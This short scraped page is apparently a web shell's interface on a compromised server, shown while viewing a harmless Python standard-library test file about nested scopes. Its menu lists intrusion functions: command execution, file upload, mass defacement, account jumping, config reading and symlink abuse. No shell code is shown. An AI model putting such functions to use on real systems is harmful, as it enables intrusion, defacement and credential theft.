OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /boot/../python/../python/lib/python3.9/test/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
"""This is a test""" import __future__ from __future__ import nested_scopes def f(x): def g(y): return x + y return g result = f(2)(4)